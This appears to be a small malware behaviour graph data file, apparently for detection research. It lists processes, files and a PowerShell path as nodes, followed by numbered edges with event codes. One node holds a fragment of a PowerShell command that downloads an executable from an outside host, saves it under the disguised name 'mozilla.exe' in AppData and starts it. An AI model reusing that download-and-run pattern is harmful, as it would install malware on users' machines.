11
MP*-Ayuaey.exe 
MF-C:\Windows\System32\windowspowershell\v1
SO-http://hiqsolution.com/kiner.exe','C:\Users\admin\AppData\Roaming\mozilla.exe');Start-Process
SF-C:\Program files\appdata\local\temp\14612
MP*-jww825a.exe 
MP*-Order Confirmation.exe 
SF-C:\Users\admin\AppData\Local\Temp\script
MF-files\appdata\local\temp\10805.bmp
MF-system_file.exe
MF-C:\Users\admin\AppData\Local\Temp\GLJC215
MP*-Dropper.exe 
21
0 1 EX-1
2 0 RF-1
0 3 RD-1
0 4 FR-1
4 1 WR-2
4 2 ST-2
4 3 UK-2
0 5 FR-1
5 1 RD-3
2 5 RF-2
0 6 WR-1
5 6 RD-3
0 7 WR-1
5 7 CD-3
0 8 EX-1
5 8 WR-3
0 9 WR-1
5 9 RD-3
10 1 RD-4
2 10 RF-2
5 10 UK-3

